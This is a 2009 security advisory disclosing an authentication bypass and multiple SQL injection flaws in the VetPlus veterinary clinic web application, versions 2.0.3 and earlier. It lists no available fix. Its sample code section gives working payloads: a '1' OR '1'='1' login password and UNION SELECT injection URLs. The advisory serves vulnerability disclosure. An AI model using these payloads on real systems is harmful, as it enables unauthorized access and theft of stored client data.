VetPlus <= 2.0.3 Multiple Remote Vulnerabilities

 Name              VetPlus
 Vendor            http://sourceforge.net/projects/vet/
 Versions Affected <= 2.0.3

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-12-16

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION

VetPlus  is a vet  clinics  system. It  currently  manages
Clients, Patients and users & schedules appointments.
In v. 1.0.1,  Auto backup to our servers & Payroll will be
added. Were also looking to add Medicine label generators,
auto notify and SMS. 


II. DESCRIPTION

Many fields are not properly sanitised.


III. ANALYSIS

Summary:

 A) Authentication Bypass
 B) Multiple SQL Injection

A) Authentication Bypass

The username and password are not properly sanitised. This
is  the cause of  a SQL Inejection that allows  a guest to
bypass the authentication.
In order to exploit this vulnerability, the  Magic  Quotes
GPC flag must be Off.


B) Multiple SQL Injection

Many GET parameters are not properly sanitised.  This flaw
allows a guest to  execute arbitrary  SQL query and obtain
reserved information stored into the database.
In order to exploit this vulnerability, the  Magic  Quotes
GPC flag must be Off.


IV. SAMPLE CODE

A) Authentication Bypass

username: admin
password: 1' OR '1'='1

B) Multiple SQL Injection

http://site/path/viewClientDetailed.php?cl=-AS001' UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

http://site/path/viewPatientDetailed.php?cl=-AS001' UNION SELECT 1,2,3,4,version(),6,7,8,9,10%23&pg=overview#&pg=overview


V. FIX

No Fix.